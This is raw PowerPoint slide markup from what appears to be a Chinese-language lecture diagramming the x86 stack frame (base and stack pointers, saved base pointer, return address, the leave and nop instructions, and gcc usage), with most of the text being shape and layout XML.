                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>位子</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5B4787-A784-7844-A84E-D03C36D8B95E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236043" y="4637196"/>
            <a:ext cx="3571519" cy="39547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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8E77BFC-5E81-7D48-8763-BB7787558A30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9807563" y="3121171"/>
            <a:ext cx="2384437" cy="916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4" name="テキスト ボックス 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6CEEA51-7EAA-9146-9A76-5AEED6BDE16A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9931022" y="3144760"/>
            <a:ext cx="21375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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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7" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC2C6722-B83A-2D4A-AF6E-00B460749FE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7651152" y="3185392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kumimoji="1" lang="zh-TW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zh-TW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8" name="正方形/長方形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68EDB795-706A-6F44-A70E-5861A1E73673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643142" y="3673338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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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9" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BE96A06-478D-6240-B143-387FA411804F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9383455" y="3374427"/>
            <a:ext cx="638710" cy="12838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線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B16992A0-4C36-48E5-ACF8-FBA6AB12B828}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6358499" y="3175214"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF0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8D87080E-E5BC-44D1-875D-211BA68F0B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3320795"/>
            <a:ext cx="680313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6902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FA9C07A6-B4F1-714D-B684-DCF8CA48C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93" b="5274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10583"/>
            <a:ext cx="6803136" cy="4150439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ADF5F9-2C8A-5E42-A684-05FB13EF3D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569112" y="1661975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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824222BD-FBA4-0B45-B59A-EB421C78A5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780930" y="1600610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1" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C199D0FF-D518-6940-8499-A7C05EBE75F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654461" y="4679213"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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2" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3DEA90-648D-2C42-B38C-CA7C75F433B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654460" y="4191019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Return</a:t>
            </a:r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Address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15" name="直線矢印コネクタ 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E8C6FA-BF2D-D349-B49D-F24359508DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2718816" y="3425176"/>
            <a:ext cx="354488" cy="1139399"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF3399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F69AEB2-2022-BB4C-A34B-411A730B8DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526536" y="4407214"/>
            <a:ext cx="2384437" cy="8925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B8C736B-1F9F-B347-94C6-D3BBBAA8D902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3595527" y="4407214"/>
            <a:ext cx="23844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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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位子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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EA517597-4BDE-034A-A592-3BDA66B47613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795617" y="4564575"/>
            <a:ext cx="1816308" cy="1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FC17F0B-F3E9-8B4B-BDFB-49C2CB07EBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718172" y="4407214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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Nop</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>不做任何事</a:t>
            </a:r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zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>編譯器自動產生</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5B4787-A784-7844-A84E-D03C36D8B95E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236043" y="4637196"/>
            <a:ext cx="3571519" cy="39547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19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01DF2120-E91D-D64F-9A0E-C2D034287EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9807563" y="3121171"/>
            <a:ext cx="2384437" cy="916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7" name="テキスト ボックス 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84DA4956-1B61-4141-8500-AF8F5FF87637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9931022" y="3144760"/>
            <a:ext cx="21375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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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8" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A78FA99-4C32-CD41-BC09-1D9EE47A1465}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7651152" y="3185392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kumimoji="1" lang="zh-TW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zh-TW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9" name="正方形/長方形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE1BC62A-8649-6E46-B494-F64905618D81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643142" y="3673338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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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30" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D20AF59-562D-A444-9771-715450FE9B68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9383455" y="3374427"/>
            <a:ext cx="638710" cy="12838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線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDDC3516-4440-497A-B152-6DDB349451E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6044390" y="3377641"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF0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72A715EC-DDE5-40A6-A46B-1D3FF6204118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3523222"/>
            <a:ext cx="680313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5788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FA9C07A6-B4F1-714D-B684-DCF8CA48C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93" b="5274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10583"/>
            <a:ext cx="6803136" cy="4150439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ADF5F9-2C8A-5E42-A684-05FB13EF3D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569112" y="1661975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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824222BD-FBA4-0B45-B59A-EB421C78A5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780930" y="1600610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1" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C199D0FF-D518-6940-8499-A7C05EBE75F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654461" y="4679213"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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2" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3DEA90-648D-2C42-B38C-CA7C75F433B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654460" y="4191019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Return</a:t>
            </a:r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Address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F69AEB2-2022-BB4C-A34B-411A730B8DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526536" y="4407214"/>
            <a:ext cx="2384437" cy="8925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B8C736B-1F9F-B347-94C6-D3BBBAA8D902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477747" y="4407214"/>
            <a:ext cx="22639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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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位子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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EA517597-4BDE-034A-A592-3BDA66B47613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795617" y="4564575"/>
            <a:ext cx="1816308" cy="1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FC17F0B-F3E9-8B4B-BDFB-49C2CB07EBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718172" y="4407214"/>
            <a:ext cx="2483294" cy="149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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>指令等於：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p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err="1"/>
              <a:t>rsp,rbp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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5B4787-A784-7844-A84E-D03C36D8B95E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236043" y="4637196"/>
            <a:ext cx="3571519" cy="39547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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF7E7A6F-FB40-9347-8CCA-B09AA18A69CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2279904" y="3697722"/>
            <a:ext cx="768096" cy="747697"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF3399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正方形/長方形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14C21530-3645-B94E-99FF-10B0BB682376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9807563" y="3121171"/>
            <a:ext cx="2384437" cy="916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7" name="テキスト ボックス 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CBDAA89-B9D0-4448-886C-20A5389C23B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9931022" y="3144760"/>
            <a:ext cx="21375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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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8" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5113C3C5-5733-954D-A1E9-2850520783E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7651152" y="3185392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kumimoji="1" lang="zh-TW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zh-TW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9" name="正方形/長方形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA9A4B96-9304-9241-AF84-0B0618A41523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643142" y="3673338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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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30" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{161D1730-12D5-3F47-8806-54C9EA583400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9383455" y="3374427"/>
            <a:ext cx="638710" cy="12838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線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6CB269C-93CA-4702-8938-FB2ED187E05E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6044390" y="3587041"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF0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5227E3F2-336C-499A-8EA2-7AEB4EDFD037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3732622"/>
            <a:ext cx="680313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565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A7284D-9DAD-D242-A7B6-B895CD8AA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2158652"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> (GNU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C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Compiler)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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>語言編譯器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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>./[FILE]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> 執行指定路徑檔案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085C816-D90B-C34B-BEDA-CEF8CBA26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418" y="2436654"/>
            <a:ext cx="8318500" cy="1308100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B27E62D-9AD1-9840-B2A8-54EACB9B98B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
